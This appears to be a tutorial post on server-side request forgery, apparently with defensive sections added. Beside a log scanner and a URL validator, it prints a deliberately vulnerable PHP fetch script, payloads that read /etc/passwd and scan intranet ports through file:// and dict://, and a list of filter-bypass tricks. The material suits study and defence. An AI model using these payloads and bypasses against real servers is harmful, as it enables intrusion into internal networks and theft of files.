Web Security: SSRF

Solemn declaration:
This note is prepared only to improve and share security knowledge. Do not use the techniques in this note for illegal activities; any consequences of using them are unrelated to the author. Maintaining network security is everyone's responsibility, and we should jointly maintain a civilized and harmonious network.

1 Introduction to SSRF

SSRF (Server Side Request Forgery) is a vulnerability in which an attacker constructs a request that is then initiated by the server. The target of an SSRF attack is usually an internal system that cannot be reached from the external network: precisely because the request is initiated by the server, it can reach internal systems that are connected to the server but isolated from the outside, with the target website acting as an intermediary.

SSRF arises because the server offers a feature that fetches data from other server applications without filtering or restricting the target address, for example fetching the text of a web page from a given URL, or loading images and documents from a given address.

2 Hazards caused by SSRF

  1. Scan the intranet: scan the ports and services of intranet and extranet hosts

    Obtain the banner information of servers reachable by the Web application (software vendor, software name, etc.), and collect fingerprints of intranet Web applications (open ports, middleware versions, etc.), then penetrate further based on this information;

  2. Attack applications running on the intranet or locally (e.g. overflows)

    Obtain weak passwords of intranet systems for intranet roaming, attack vulnerable intranet Web applications and obtain a webshell

  3. Attack Web applications on the intranet and extranet, mainly attacks that can be carried out with GET requests

  4. Use the file protocol to read local sensitive files, etc.

    Use vulnerable components together with the ftp://, file://, gopher://, dict:// and other protocols to carry out attacks (such as FFmpeg arbitrary file read, XXE attacks, etc.).

3 Where SSRF vulnerabilities may occur

An SSRF vulnerability may exist wherever the server requests a resource from a remote server:

  • Sharing: share web content via a URL address

  • Transcoding services

  • Online translation

  • Picture loading and downloading: load or download pictures via a URL address

  • Picture and article collection (bookmarking) functions

  • Unpublished API implementations and other functions that call URLs

  • Look for these keywords in URL parameter names:

    • share
    • wap
    • url
    • link
    • src
    • source
    • target
    • u
    • 3g
    • display
    • sourceURl
    • imageURL
    • domain

4 SSRF vulnerability verification

4.1 Verification by elimination

4.1.1 Click verification

Again, take a picture as an example:

  • Find the address of the loaded resource in the page source. If the resource address has the form www.target.com/xxx.php?image=http://image_address.com, there may be an SSRF vulnerability.

  • You can also right-click the picture and open it in a new window. If the browser's address bar then shows http://image_address.com, the image is fetched directly by the browser rather than by the server, and there is no SSRF vulnerability.

4.1.2 packet capture analysis

Because SSRF is a vulnerability in which the server is made to send requests, we can determine whether one exists by capturing packets and checking whether the outgoing requests are sent by the server:

GET /ssrf01.php?url=http://192.168.100.129/phpMyAdmin/favicon.ico HTTP/1.1
Host: ssrf.lab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=bvp2vv845n0les2efk4hg5b445
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
# The SSRF vulnerability is in the url parameter of the request line above: the server fetches whatever that parameter names
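
The capture above shows that the value of the url parameter is fetched by the server. As an added example that is not part of the original post, here is detection logic a defender could run over web-server access logs to find the same pattern after the fact: it extracts the URL-type parameters from section 3's keyword list out of each request line and flags values with a non-http scheme or a literal non-public address. It assumes Apache combined log format; the log lines are constructed samples (not real traffic), and the function names are my own.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names that commonly carry a URL the server will fetch (the keyword list from section 3).
URL_PARAM_NAMES = {"share", "wap", "url", "link", "src", "source", "target", "u",
                   "3g", "display", "sourceurl", "imageurl", "domain"}
EXPECTED_SCHEMES = {"http", "https"}
# The request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Constructed sample log lines (not real traffic); the first two mirror the page's payloads.
SAMPLE_LOG = [
    '192.168.100.50 - - [22/Jan/2022:03:34:00 +0200] "GET /ssrf01.php?url=http://192.168.100.129/phpMyAdmin/favicon.ico HTTP/1.1" 200 1406',
    '192.168.100.50 - - [22/Jan/2022:03:34:05 +0200] "GET /ssrf01.php?url=file:///etc/passwd HTTP/1.1" 200 2381',
    '192.168.100.50 - - [22/Jan/2022:03:34:09 +0200] "GET /share.php?link=https://example.com/page HTTP/1.1" 200 512',
    '192.168.100.50 - - [22/Jan/2022:03:34:12 +0200] "GET /index.php?page=home HTTP/1.1" 200 4096',
]


def classify_target(url):
    """Reasons a server-side fetch of `url` looks like SSRF abuse ([] if none)."""
    parts = urlsplit(url)
    reasons = []
    scheme = parts.scheme.lower()
    if scheme not in EXPECTED_SCHEMES:
        reasons.append(f"non-http scheme {scheme!r}")
    host = parts.hostname
    if host:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            ip = None  # a hostname: resolve it offline against your own address ranges
        if ip is not None and not ip.is_global:
            reasons.append(f"non-public address {host}")
    return reasons


def scan_log(lines):
    """Return (request_target, param, value, reasons) for every suspicious URL parameter."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        query = target.partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            # Only parameters that carry a full URL (with a scheme) are fetch targets.
            if name.lower() not in URL_PARAM_NAMES or not urlsplit(value).scheme:
                continue
            reasons = classify_target(value)
            if reasons:
                findings.append((target, name, value, reasons))
    return findings


if __name__ == "__main__":
    for target, name, value, reasons in scan_log(SAMPLE_LOG):
        print(f"{target}  [{name}] {value}: {'; '.join(reasons)}")
```

A hostname in the parameter (rather than an IP literal) is deliberately not resolved here, since resolving attacker-supplied names from a detection pipeline is itself an outbound request; match such names against your own internal zones instead.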

5 SSRF exploitation methods

Reference: SSRF PHP - p0pl4r - Blog Garden (cnblogs.com)

5.1 No restrictions

5.1.1 ssrf01.php

<?php
// Variant 1: the url parameter goes straight into cURL with no scheme or host check (the SSRF).
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body so the caller can echo it
    $ret = curl_exec($ch);
    curl_close($ch);
    return $ret;
}

$url = $_GET['url'];
$ret = curl($url);
echo $ret;
?>

<?php
// Variant 2: the same unfiltered fetch with a 5 s timeout; without a url parameter the
// script plays the "server" role and answers after 10 s.
include 'init.php';
if ($_GET['url']) {
        // Client
        $url = $_GET['url'];
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_NOSIGNAL, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT_MS, 5000);
        $data = curl_exec($ch);
        $curl_errno = curl_errno($ch);
        $curl_error = curl_error($ch);
        curl_close($ch);

        if ($curl_errno > 0) {
                echo "cURL Error ($curl_errno): $curl_error\n";
        } else {
                echo "$data\n";
        }
} else {
        // Server
        sleep(10);
        echo "Done.";
}
?>

5.1.2 Payloads

// View intranet hosts using the http protocol
http://ssrf.lab.com/ssrf01.php?url=http://192.168.100.129

// Arbitrary file read using the file protocol
http://ssrf.lab.com/ssrf01.php?url=file:///etc/passwd

// View ports using the dict protocol
http://ssrf.lab.com/ssrf01.php?url=dict://192.168.100.129:80

6 Bypass methods

  1. http://www.baidu.com@10.10.10.10 and http://10.10.10.10 are the same request: the content obtained is that of 10.10.10.10, because the part before @ is treated as user information rather than as the host.

  2. Access the IP address written in hexadecimal.

  3. Adding a port may bypass matching rules, e.g. 10.10.10.10:80.

  4. Bypass with a short URL (302 redirect).

  5. Use enclosed alphanumerics:

    ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
    List:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
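
Every bypass in the list above defeats a check that compares the raw URL string. As an added example that is not part of the original post (nor of the referenced blog), this Python validator for a server-side fetch feature (the ssrf01.php use case from section 5) handles them structurally: it allows only http and https, rejects userinfo so www.baidu.com@10.10.10.10 is not mistaken for baidu, decodes the inet_aton spellings (hexadecimal, octal, plain decimal) that libcurl accepts, checks the host independently of any port, folds enclosed alphanumerics with NFKC before IDNA encoding, and resolves hostnames so that the final address is what gets checked. The function names, the constructed DNS table and the 8.8.8.8 stand-in for a public address are my assumptions.

```python
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table so the demo runs offline; real deployments pass system_resolver.
CONSTRUCTED_DNS = {
    "example.com": {ipaddress.ip_address("8.8.8.8")},           # stand-in for a public address
    "internal.lab": {ipaddress.ip_address("192.168.100.129")},  # stand-in for an intranet host
}

def constructed_resolver(host):
    return CONSTRUCTED_DNS.get(host, set())

def system_resolver(host):
    # Every address the OS resolver returns for host (zone ids such as %eth0 dropped).
    return {ipaddress.ip_address(info[4][0].split("%")[0])
            for info in socket.getaddrinfo(host, None)}

def normalize_host(host):
    """Fold lookalike spellings into lowercase ASCII: NFKC turns enclosed alphanumerics
    (ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ) into plain letters, then the IDNA codec validates each label."""
    host = unicodedata.normalize("NFKC", host).lower().rstrip(".")
    try:
        return host.encode("idna").decode("ascii")
    except UnicodeError as exc:
        raise ValueError(f"invalid hostname {host!r}") from exc

def parse_legacy_ipv4(host):
    """Decode the inet_aton spellings libcurl accepts but ipaddress rejects
    (0xa0a0a0a, 0251.0.0.1, 168430090, 10.10.2570). None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for part in parts:
        try:
            if part.lower().startswith("0x"):
                nums.append(int(part, 16))
            elif len(part) > 1 and part[0] == "0":
                nums.append(int(part, 8))
            else:
                nums.append(int(part, 10))
        except ValueError:
            return None
    *lead, last = nums
    if any(not 0 <= n <= 255 for n in lead) or not 0 <= last < 256 ** (4 - len(lead)):
        return None
    value = 0
    for n in lead:                      # leading parts are one byte each,
        value = (value << 8) | n
    value = (value << (8 * (4 - len(lead)))) | last   # the last part fills the rest
    return ipaddress.IPv4Address(value)

def is_internal(ip):
    """True for any address a server-side fetch must never reach."""
    mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:10.0.0.1 is really 10.0.0.1
    ip = mapped if mapped is not None else ip
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified)

def validate_outbound_url(url, resolver=system_resolver):
    """Return (normalized_host, addresses) if url may be fetched; raise ValueError otherwise."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    # In http://www.baidu.com@10.10.10.10 the text before '@' is userinfo; the host is 10.10.10.10.
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo (user@host) is not allowed")
    if not parts.hostname:
        raise ValueError("missing host")
    host = normalize_host(parts.hostname)
    # The port is parsed separately, so 10.10.10.10:80 is checked exactly like 10.10.10.10.
    try:
        addresses = {ipaddress.ip_address(host)}
    except ValueError:
        legacy = parse_legacy_ipv4(host)
        addresses = {legacy} if legacy is not None else resolver(host)
    if not addresses:
        raise ValueError(f"host {host!r} does not resolve")
    for ip in addresses:
        if is_internal(ip):
            raise ValueError(f"{host!r} resolves to internal address {ip}")
    return host, addresses

def check(url, resolver=constructed_resolver):
    # One-line verdict for a URL, using the offline table by default.
    try:
        host, addresses = validate_outbound_url(url, resolver)
        return f"allowed ({host} -> {', '.join(sorted(map(str, addresses)))})"
    except ValueError as exc:
        return f"rejected: {exc}"

if __name__ == "__main__":
    for candidate in ("http://www.baidu.com@10.10.10.10/", "http://0xa0a0a0a/", "http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ/"):
        print(candidate, "=>", check(candidate))
```

Two things the validator cannot do on its own: for the short-URL bypass (item 4), turn off automatic redirect following in the HTTP client (CURLOPT_FOLLOWLOCATION in PHP cURL) and run validate_outbound_url on every Location header before following it; and connect to the address that was validated rather than resolving the name a second time, otherwise a DNS answer that changes between the check and the connection (DNS rebinding) slips past the check.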
    

Keywords: metasploit

Added by warmwind on Sat, 22 Jan 2022 03:34:00 +0200